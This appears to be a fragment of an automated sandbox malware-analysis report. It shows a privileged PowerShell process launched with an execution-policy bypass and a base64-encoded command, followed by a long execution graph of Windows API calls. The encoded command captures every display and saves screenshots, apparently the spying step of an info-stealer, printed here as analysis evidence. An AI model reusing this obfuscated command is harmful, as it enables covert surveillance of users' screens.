                                                                                                                                                                                                                                  Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                  Imagebase:0x7ff6e3d50000
                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:10.3%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:20.1%
                                                                                                                                                                                                                                    Total number of Nodes:2000
                                                                                                                                                                                                                                    Total number of Limit Nodes:27
                                                                                                                                                                                                                                    execution_graph 19558 7ff7b2b8abe3 19559 7ff7b2b8abf3 19558->19559 19562 7ff7b2b75478 LeaveCriticalSection 19559->19562 19510 7ff7b2b79961 19511 7ff7b2b7a3d8 45 API calls 19510->19511 19512 7ff7b2b79966 19511->19512 19513 7ff7b2b7998d GetModuleHandleW 19512->19513 19514 7ff7b2b799d7 19512->19514 19513->19514 19520 7ff7b2b7999a 19513->19520 19522 7ff7b2b79864 19514->19522 19520->19514 19536 7ff7b2b79a88 GetModuleHandleExW 19520->19536 19542 7ff7b2b802d8 EnterCriticalSection 19522->19542 19537 7ff7b2b79abc GetProcAddress 19536->19537 19538 7ff7b2b79ae5 19536->19538 19541 7ff7b2b79ace 19537->19541 19539 7ff7b2b79aea FreeLibrary 19538->19539 19540 7ff7b2b79af1 19538->19540 19539->19540 19540->19514 19541->19538 19553 7ff7b2b6bae0 19554 7ff7b2b6bb0e 19553->19554 19555 7ff7b2b6baf5 19553->19555 19555->19554 19557 7ff7b2b7d5fc 12 API calls 19555->19557 19556 7ff7b2b6bb6e 19557->19556 19844 7ff7b2b8ad69 19847 7ff7b2b75478 LeaveCriticalSection 19844->19847 19632 7ff7b2b8adfe 19633 7ff7b2b8ae17 19632->19633 19634 7ff7b2b8ae0d 19632->19634 19636 7ff7b2b80338 LeaveCriticalSection 19634->19636 15899 7ff7b2b7f98c 15900 7ff7b2b7fb7e 15899->15900 15902 7ff7b2b7f9ce _isindst 15899->15902 15951 7ff7b2b74f08 15900->15951 15902->15900 15905 7ff7b2b7fa4e _isindst 15902->15905 15920 7ff7b2b86194 15905->15920 15910 7ff7b2b7fbaa 15963 7ff7b2b7a900 IsProcessorFeaturePresent 15910->15963 15917 7ff7b2b7faab 15919 7ff7b2b7fb6e 15917->15919 15944 7ff7b2b861d8 15917->15944 15954 7ff7b2b6c550 15919->15954 15921 7ff7b2b861a3 15920->15921 15922 7ff7b2b7fa6c 15920->15922 15967 7ff7b2b802d8 EnterCriticalSection 15921->15967 15926 7ff7b2b85598 15922->15926 15927 7ff7b2b855a1 15926->15927 15931 7ff7b2b7fa81 15926->15931 15928 7ff7b2b74f08 _get_daylight 11 API calls 15927->15928 15929 7ff7b2b855a6 15928->15929 15968 7ff7b2b7a8e0 15929->15968 15931->15910 15932 7ff7b2b855c8 15931->15932 15933 7ff7b2b7fa92 15932->15933 15934 7ff7b2b855d1 15932->15934 15933->15910 15938 7ff7b2b855f8 15933->15938 15935 7ff7b2b74f08 _get_daylight 11 API calls 15934->15935 15936 7ff7b2b855d6 15935->15936 15937 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 15936->15937 15937->15933 15939 7ff7b2b7faa3 15938->15939 15940 7ff7b2b85601 15938->15940 15939->15910 15939->15917 15941 7ff7b2b74f08 _get_daylight 11 API calls 15940->15941 15942 7ff7b2b85606 15941->15942 15943 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 15942->15943 15943->15939 16052 7ff7b2b802d8 EnterCriticalSection 15944->16052 16053 7ff7b2b7b2c8 GetLastError 15951->16053 15953 7ff7b2b74f11 15953->15919 15955 7ff7b2b6c559 15954->15955 15956 7ff7b2b6c8e0 IsProcessorFeaturePresent 15955->15956 15957 7ff7b2b6c564 15955->15957 15958 7ff7b2b6c8f8 15956->15958 16070 7ff7b2b6cad8 RtlCaptureContext 15958->16070 15964 7ff7b2b7a913 15963->15964 16075 7ff7b2b7a614 15964->16075 15971 7ff7b2b7a778 15968->15971 15970 7ff7b2b7a8f9 15970->15931 15972 7ff7b2b7a7a3 15971->15972 15975 7ff7b2b7a814 15972->15975 15974 7ff7b2b7a7ca 15974->15970 15985 7ff7b2b7a55c 15975->15985 15979 7ff7b2b7a84f 15979->15974 15981 7ff7b2b7a900 _isindst 17 API calls 15982 7ff7b2b7a8df 15981->15982 15983 7ff7b2b7a778 _invalid_parameter_noinfo 37 API calls 15982->15983 15984 7ff7b2b7a8f9 15983->15984 15984->15974 15986 7ff7b2b7a578 GetLastError 15985->15986 15987 7ff7b2b7a5b3 15985->15987 15988 7ff7b2b7a588 15986->15988 15987->15979 15991 7ff7b2b7a5c8 15987->15991 15994 7ff7b2b7b390 15988->15994 15992 7ff7b2b7a5fc 15991->15992 15993 7ff7b2b7a5e4 GetLastError SetLastError 15991->15993 15992->15979 15992->15981 15993->15992 15995 7ff7b2b7b3ca FlsSetValue 15994->15995 15996 7ff7b2b7b3af FlsGetValue 15994->15996 15998 7ff7b2b7b3d7 15995->15998 15999 7ff7b2b7a5a3 SetLastError 15995->15999 15997 7ff7b2b7b3c4 15996->15997 15996->15999 15997->15995 16011 7ff7b2b7eb98 15998->16011 15999->15987 16002 7ff7b2b7b404 FlsSetValue 16005 7ff7b2b7b422 16002->16005 16006 7ff7b2b7b410 FlsSetValue 16002->16006 16003 7ff7b2b7b3f4 FlsSetValue 16004 7ff7b2b7b3fd 16003->16004 16018 7ff7b2b7a948 16004->16018 16024 7ff7b2b7aef4 16005->16024 16006->16004 16016 7ff7b2b7eba9 _get_daylight 16011->16016 16012 7ff7b2b7ebfa 16015 7ff7b2b74f08 _get_daylight 10 API calls 16012->16015 16013 7ff7b2b7ebde HeapAlloc 16014 7ff7b2b7b3e6 16013->16014 16013->16016 16014->16002 16014->16003 16015->16014 16016->16012 16016->16013 16029 7ff7b2b83590 16016->16029 16019 7ff7b2b7a94d RtlFreeHeap 16018->16019 16023 7ff7b2b7a97c 16018->16023 16020 7ff7b2b7a968 GetLastError 16019->16020 16019->16023 16021 7ff7b2b7a975 Concurrency::details::SchedulerProxy::DeleteThis 16020->16021 16022 7ff7b2b74f08 _get_daylight 9 API calls 16021->16022 16022->16023 16023->15999 16038 7ff7b2b7adcc 16024->16038 16032 7ff7b2b835d0 16029->16032 16037 7ff7b2b802d8 EnterCriticalSection 16032->16037 16050 7ff7b2b802d8 EnterCriticalSection 16038->16050 16054 7ff7b2b7b309 FlsSetValue 16053->16054 16057 7ff7b2b7b2ec 16053->16057 16055 7ff7b2b7b31b 16054->16055 16056 7ff7b2b7b2f9 16054->16056 16059 7ff7b2b7eb98 _get_daylight 5 API calls 16055->16059 16058 7ff7b2b7b375 SetLastError 16056->16058 16057->16054 16057->16056 16058->15953 16060 7ff7b2b7b32a 16059->16060 16061 7ff7b2b7b348 FlsSetValue 16060->16061 16062 7ff7b2b7b338 FlsSetValue 16060->16062 16064 7ff7b2b7b366 16061->16064 16065 7ff7b2b7b354 FlsSetValue 16061->16065 16063 7ff7b2b7b341 16062->16063 16066 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16063->16066 16067 7ff7b2b7aef4 _get_daylight 5 API calls 16064->16067 16065->16063 16066->16056 16068 7ff7b2b7b36e 16067->16068 16069 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 16068->16069 16069->16058 16071 7ff7b2b6caf2 RtlLookupFunctionEntry 16070->16071 16072 7ff7b2b6cb08 RtlVirtualUnwind 16071->16072 16073 7ff7b2b6c90b 16071->16073 16072->16071 16072->16073 16074 7ff7b2b6c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16073->16074 16076 7ff7b2b7a64e _isindst __scrt_get_show_window_mode 16075->16076 16077 7ff7b2b7a676 RtlCaptureContext RtlLookupFunctionEntry 16076->16077 16078 7ff7b2b7a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16077->16078 16079 7ff7b2b7a6b0 RtlVirtualUnwind 16077->16079 16080 7ff7b2b7a738 _isindst 16078->16080 16079->16078 16081 7ff7b2b6c550 _log10_special 8 API calls 16080->16081 16082 7ff7b2b7a757 GetCurrentProcess TerminateProcess 16081->16082 19668 7ff7b2b75410 19669 7ff7b2b7541b 19668->19669 19677 7ff7b2b7f2a4 19669->19677 19690 7ff7b2b802d8 EnterCriticalSection 19677->19690 19855 7ff7b2b7c520 19866 7ff7b2b802d8 EnterCriticalSection 19855->19866 19397 7ff7b2b75628 19398 7ff7b2b75642 19397->19398 19399 7ff7b2b7565f 19397->19399 19400 7ff7b2b74ee8 _fread_nolock 11 API calls 19398->19400 19399->19398 19401 7ff7b2b75672 CreateFileW 19399->19401 19402 7ff7b2b75647 19400->19402 19403 7ff7b2b756dc 19401->19403 19404 7ff7b2b756a6 19401->19404 19406 7ff7b2b74f08 _get_daylight 11 API calls 19402->19406 19448 7ff7b2b75c04 19403->19448 19422 7ff7b2b7577c GetFileType 19404->19422 19409 7ff7b2b7564f 19406->19409 19413 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19409->19413 19411 7ff7b2b756e5 19416 7ff7b2b74e7c _fread_nolock 11 API calls 19411->19416 19412 7ff7b2b75710 19469 7ff7b2b759c4 19412->19469 19418 7ff7b2b7565a 19413->19418 19414 7ff7b2b756bb CloseHandle 19414->19418 19415 7ff7b2b756d1 CloseHandle 19415->19418 19421 7ff7b2b756ef 19416->19421 19421->19418 19423 7ff7b2b757ca 19422->19423 19424 7ff7b2b75887 19422->19424 19425 7ff7b2b757f6 GetFileInformationByHandle 19423->19425 19428 7ff7b2b75b00 21 API calls 19423->19428 19426 7ff7b2b758b1 19424->19426 19427 7ff7b2b7588f 19424->19427 19429 7ff7b2b758a2 GetLastError 19425->19429 19430 7ff7b2b7581f 19425->19430 19432 7ff7b2b758d4 PeekNamedPipe 19426->19432 19437 7ff7b2b75872 19426->19437 19427->19429 19431 7ff7b2b75893 19427->19431 19438 7ff7b2b757e4 19428->19438 19435 7ff7b2b74e7c _fread_nolock 11 API calls 19429->19435 19433 7ff7b2b759c4 51 API calls 19430->19433 19434 7ff7b2b74f08 _get_daylight 11 API calls 19431->19434 19432->19437 19439 7ff7b2b7582a 19433->19439 19434->19437 19435->19437 19436 7ff7b2b6c550 _log10_special 8 API calls 19440 7ff7b2b756b4 19436->19440 19437->19436 19438->19425 19438->19437 19486 7ff7b2b75924 19439->19486 19440->19414 19440->19415 19443 7ff7b2b75924 10 API calls 19444 7ff7b2b75849 19443->19444 19445 7ff7b2b75924 10 API calls 19444->19445 19446 7ff7b2b7585a 19445->19446 19446->19437 19447 7ff7b2b74f08 _get_daylight 11 API calls 19446->19447 19447->19437 19449 7ff7b2b75c3a 19448->19449 19450 7ff7b2b74f08 _get_daylight 11 API calls 19449->19450 19468 7ff7b2b75cd2 __std_exception_copy 19449->19468 19452 7ff7b2b75c4c 19450->19452 19451 7ff7b2b6c550 _log10_special 8 API calls 19453 7ff7b2b756e1 19451->19453 19454 7ff7b2b74f08 _get_daylight 11 API calls 19452->19454 19453->19411 19453->19412 19455 7ff7b2b75c54 19454->19455 19456 7ff7b2b77e08 45 API calls 19455->19456 19457 7ff7b2b75c69 19456->19457 19458 7ff7b2b75c7b 19457->19458 19459 7ff7b2b75c71 19457->19459 19461 7ff7b2b74f08 _get_daylight 11 API calls 19458->19461 19460 7ff7b2b74f08 _get_daylight 11 API calls 19459->19460 19464 7ff7b2b75c76 19460->19464 19462 7ff7b2b75c80 19461->19462 19463 7ff7b2b74f08 _get_daylight 11 API calls 19462->19463 19462->19468 19465 7ff7b2b75c8a 19463->19465 19466 7ff7b2b75cc4 GetDriveTypeW 19464->19466 19464->19468 19467 7ff7b2b77e08 45 API calls 19465->19467 19466->19468 19467->19464 19468->19451 19471 7ff7b2b759ec 19469->19471 19470 7ff7b2b7571d 19479 7ff7b2b75b00 19470->19479 19471->19470 19493 7ff7b2b7f724 19471->19493 19473 7ff7b2b75a80 19473->19470 19474 7ff7b2b7f724 51 API calls 19473->19474 19475 7ff7b2b75a93 19474->19475 19475->19470 19476 7ff7b2b7f724 51 API calls 19475->19476 19477 7ff7b2b75aa6 19476->19477 19477->19470 19478 7ff7b2b7f724 51 API calls 19477->19478 19478->19470 19480 7ff7b2b75b1a 19479->19480 19481 7ff7b2b75b51 19480->19481 19482 7ff7b2b75b2a 19480->19482 19483 7ff7b2b7f5b8 21 API calls 19481->19483 19484 7ff7b2b74e7c _fread_nolock 11 API calls 19482->19484 19485 7ff7b2b75b3a 19482->19485 19483->19485 19484->19485 19485->19421 19487 7ff7b2b7594d FileTimeToSystemTime 19486->19487 19488 7ff7b2b75940 19486->19488 19489 7ff7b2b75961 SystemTimeToTzSpecificLocalTime 19487->19489 19490 7ff7b2b75948 19487->19490 19488->19487 19488->19490 19489->19490 19491 7ff7b2b6c550 _log10_special 8 API calls 19490->19491 19492 7ff7b2b75839 19491->19492 19492->19443 19494 7ff7b2b7f755 19493->19494 19495 7ff7b2b7f731 19493->19495 19497 7ff7b2b7f78f 19494->19497 19500 7ff7b2b7f7ae 19494->19500 19495->19494 19496 7ff7b2b7f736 19495->19496 19498 7ff7b2b74f08 _get_daylight 11 API calls 19496->19498 19499 7ff7b2b74f08 _get_daylight 11 API calls 19497->19499 19501 7ff7b2b7f73b 19498->19501 19503 7ff7b2b7f794 19499->19503 19504 7ff7b2b74f4c 45 API calls 19500->19504 19502 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19501->19502 19505 7ff7b2b7f746 19502->19505 19506 7ff7b2b7a8e0 _invalid_parameter_noinfo 37 API calls 19503->19506 19507 7ff7b2b7f7bb 19504->19507 19505->19473 19508 7ff7b2b7f79f 19506->19508 19507->19508 19509 7ff7b2b804dc 51 API calls 19507->19509 19508->19473 19509->19507 20079 7ff7b2b816b0 20090 7ff7b2b873e4 20079->20090 20092 7ff7b2b873f1 20090->20092 20091 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20091->20092 20092->20091 20093 7ff7b2b8740d 20092->20093 20094 7ff7b2b7a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20093->20094 20095 7ff7b2b816b9 20093->20095 20094->20093 20096 7ff7b2b802d8 EnterCriticalSection 20095->20096 16083 7ff7b2b6cc3c 16104 7ff7b2b6ce0c 16083->16104 16086 7ff7b2b6cd88 16258 7ff7b2b6d12c IsProcessorFeaturePresent 16086->16258 16087 7ff7b2b6cc58 __scrt_acquire_startup_lock 16089 7ff7b2b6cd92 16087->16089 16094 7ff7b2b6cc76 __scrt_release_startup_lock 16087->16094 16090 7ff7b2b6d12c 7 API calls 16089->16090 16092 7ff7b2b6cd9d __CxxCallCatchBlock 16090->16092 16091 7ff7b2b6cc9b 16093 7ff7b2b6cd21 16110 7ff7b2b6d274 16093->16110 16094->16091 16094->16093 16247 7ff7b2b79b2c 16094->16247 16096 7ff7b2b6cd26 16113 7ff7b2b61000 16096->16113 16101 7ff7b2b6cd49 16101->16092 16254 7ff7b2b6cf90 16101->16254 16105 7ff7b2b6ce14 16104->16105 16106 7ff7b2b6ce20 __scrt_dllmain_crt_thread_attach 16105->16106 16107 7ff7b2b6ce2d 16106->16107 16109 7ff7b2b6cc50 16106->16109 16107->16109 16265 7ff7b2b6d888 16107->16265 16109->16086 16109->16087 16292 7ff7b2b8a4d0 16110->16292 16112 7ff7b2b6d28b GetStartupInfoW 16112->16096 16114 7ff7b2b61009 16113->16114 16294 7ff7b2b75484 16114->16294 16116 7ff7b2b637fb 16301 7ff7b2b636b0 16116->16301 16121 7ff7b2b6c550 _log10_special 8 API calls 16124 7ff7b2b63ca7 16121->16124 16122 7ff7b2b6383c 16468 7ff7b2b61c80 16122->16468 16123 7ff7b2b6391b 16477 7ff7b2b645c0 16123->16477 16252 7ff7b2b6d2b8 GetModuleHandleW 16124->16252 16127 7ff7b2b6385b 16373 7ff7b2b68830 16127->16373 16130 7ff7b2b6396a 16500 7ff7b2b62710 16130->16500 16132 7ff7b2b6388e 16140 7ff7b2b638bb __std_exception_copy 16132->16140 16472 7ff7b2b689a0 16132->16472 16134 7ff7b2b6395d 16135 7ff7b2b63984 16134->16135 16136 7ff7b2b63962 16134->16136 16138 7ff7b2b61c80 49 API calls 16135->16138 16496 7ff7b2b7004c 16136->16496 16141 7ff7b2b639a3 16138->16141 16142 7ff7b2b68830 14 API calls 16140->16142 16149 7ff7b2b638de __std_exception_copy 16140->16149 16146 7ff7b2b61950 115 API calls 16141->16146 16142->16149 16143 7ff7b2b68940 40 API calls 16144 7ff7b2b63a0b 16143->16144 16145 7ff7b2b689a0 40 API calls 16144->16145 16147 7ff7b2b63a17 16145->16147 16148 7ff7b2b639ce 16146->16148 16150 7ff7b2b689a0 40 API calls 16147->16150 16148->16127 16151 7ff7b2b639de 16148->16151 16149->16143 16155 7ff7b2b6390e __std_exception_copy 16149->16155 16152 7ff7b2b63a23 16150->16152 16153 7ff7b2b62710 54 API calls 16151->16153 16154 7ff7b2b689a0 40 API calls 16152->16154 16161 7ff7b2b63808 __std_exception_copy 16153->16161 16154->16155 16156 7ff7b2b68830 14 API calls 16155->16156 16157 7ff7b2b63a3b 16156->16157 16158 7ff7b2b63b2f 16157->16158 16159 7ff7b2b63a60 __std_exception_copy 16157->16159 16160 7ff7b2b62710 54 API calls 16158->16160 16173 7ff7b2b63aab 16159->16173 16386 7ff7b2b68940 16159->16386 16160->16161 16161->16121 16163 7ff7b2b68830 14 API calls 16164 7ff7b2b63bf4 __std_exception_copy 16163->16164 16165 7ff7b2b63c46 16164->16165 16166 7ff7b2b63d41 16164->16166 16167 7ff7b2b63cd4 16165->16167 16168 7ff7b2b63c50 16165->16168 16511 7ff7b2b644e0 16166->16511 16171 7ff7b2b68830 14 API calls 16167->16171 16393 7ff7b2b690e0 16168->16393 16175 7ff7b2b63ce0 16171->16175 16172 7ff7b2b63d4f 16176 7ff7b2b63d65 16172->16176 16177 7ff7b2b63d71 16172->16177 16173->16163 16178 7ff7b2b63c61 16175->16178 16181 7ff7b2b63ced 16175->16181 16514 7ff7b2b64630 16176->16514 16180 7ff7b2b61c80 49 API calls 16177->16180 16183 7ff7b2b62710 54 API calls 16178->16183 16190 7ff7b2b63cc8 __std_exception_copy 16180->16190 16184 7ff7b2b61c80 49 API calls 16181->16184 16183->16161 16187 7ff7b2b63d0b 16184->16187 16185 7ff7b2b63dc4 16443 7ff7b2b69390 16185->16443 16187->16190 16191 7ff7b2b63d12 16187->16191 16189 7ff7b2b63dd7 SetDllDirectoryW 16195 7ff7b2b63e0a 16189->16195 16237 7ff7b2b63e5a 16189->16237 16190->16185 16192 7ff7b2b63da7 SetDllDirectoryW LoadLibraryExW 16190->16192 16194 7ff7b2b62710 54 API calls 16191->16194 16192->16185 16194->16161 16196 7ff7b2b68830 14 API calls 16195->16196 16201 7ff7b2b63e16 __std_exception_copy 16196->16201 16197 7ff7b2b64008 16199 7ff7b2b64035 16197->16199 16200 7ff7b2b64012 PostMessageW GetMessageW 16197->16200 16198 7ff7b2b63f1b 16448 7ff7b2b633c0 16198->16448 16591 7ff7b2b63360 16199->16591 16200->16199 16207 7ff7b2b63ef2 16201->16207 16211 7ff7b2b63e4e 16201->16211 16210 7ff7b2b68940 40 API calls 16207->16210 16210->16237 16211->16237 16517 7ff7b2b66dc0 16211->16517 16237->16197 16237->16198 16248 7ff7b2b79b64 16247->16248 16249 7ff7b2b79b43 16247->16249 18710 7ff7b2b7a3d8 16248->18710 16249->16093 16253 7ff7b2b6d2c9 16252->16253 16253->16101 16255 7ff7b2b6cfa1 16254->16255 16256 7ff7b2b6cd60 16255->16256 16257 7ff7b2b6d888 7 API calls 16255->16257 16256->16091 16257->16256 16259 7ff7b2b6d152 _isindst __scrt_get_show_window_mode 16258->16259 16260 7ff7b2b6d171 RtlCaptureContext RtlLookupFunctionEntry 16259->16260 16261 7ff7b2b6d19a RtlVirtualUnwind 16260->16261 16262 7ff7b2b6d1d6 __scrt_get_show_window_mode 16260->16262 16261->16262 16263 7ff7b2b6d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16262->16263 16264 7ff7b2b6d256 _isindst 16263->16264 16264->16089 16266 7ff7b2b6d89a 16265->16266 16267 7ff7b2b6d890 16265->16267 16266->16109 16271 7ff7b2b6dc24 16267->16271 16272 7ff7b2b6dc33 16271->16272 16273 7ff7b2b6d895 16271->16273 16279 7ff7b2b6de60 16272->16279 16275 7ff7b2b6dc90 16273->16275 16276 7ff7b2b6dcbb 16275->16276 16277 7ff7b2b6dc9e DeleteCriticalSection 16276->16277 16278 7ff7b2b6dcbf 16276->16278 16277->16276 16278->16266 16283 7ff7b2b6dcc8 16279->16283 16284 7ff7b2b6dd0c __vcrt_FlsAlloc 16283->16284 16285 7ff7b2b6ddb2 TlsFree 16283->16285 16284->16285 16286 7ff7b2b6dd3a LoadLibraryExW 16284->16286 16287 7ff7b2b6ddf9 GetProcAddress 16284->16287 16291 7ff7b2b6dd7d LoadLibraryExW 16284->16291 16288 7ff7b2b6dd5b GetLastError 16286->16288 16289 7ff7b2b6ddd9 16286->16289 16287->16285 16288->16284 16289->16287 16290 7ff7b2b6ddf0 FreeLibrary 16289->16290 16290->16287 16291->16284 16291->16289 16293 7ff7b2b8a4c0 16292->16293 16293->16112 16293->16293 16297 7ff7b2b7f480 16294->16297 16295 7ff7b2b7f4d3 16296 7ff7b2b7a814 _invalid_parameter_noinfo 37 API calls 16295->16296 16300 7ff7b2b7f4fc 16296->16300 16297->16295 16298 7ff7b2b7f526 16297->16298 16604 7ff7b2b7f358 16298->16604 16300->16116 16612 7ff7b2b6c850 16301->16612 16304 7ff7b2b636eb GetLastError 16619 7ff7b2b62c50 16304->16619 16305 7ff7b2b63710 16614 7ff7b2b69280 FindFirstFileExW 16305->16614 16308 7ff7b2b63706 16313 7ff7b2b6c550 _log10_special 8 API calls 16308->16313 16310 7ff7b2b6377d 16645 7ff7b2b69440 16310->16645 16311 7ff7b2b63723 16634 7ff7b2b69300 CreateFileW 16311->16634 16316 7ff7b2b637b5 16313->16316 16315 7ff7b2b6378b 16315->16308 16320 7ff7b2b62810 49 API calls 16315->16320 16316->16161 16323 7ff7b2b61950 16316->16323 16318 7ff7b2b6374c __vcrt_FlsAlloc 16318->16310 16319 7ff7b2b63734 16637 7ff7b2b62810 16319->16637 16320->16308 16324 7ff7b2b645c0 108 API calls 16323->16324 16325 7ff7b2b61985 16324->16325 16326 7ff7b2b61c43 16325->16326 16327 7ff7b2b67f90 83 API calls 16325->16327 16328 7ff7b2b6c550 _log10_special 8 API calls 16326->16328 16329 7ff7b2b619cb 16327->16329 16330 7ff7b2b61c5e 16328->16330 16372 7ff7b2b61a03 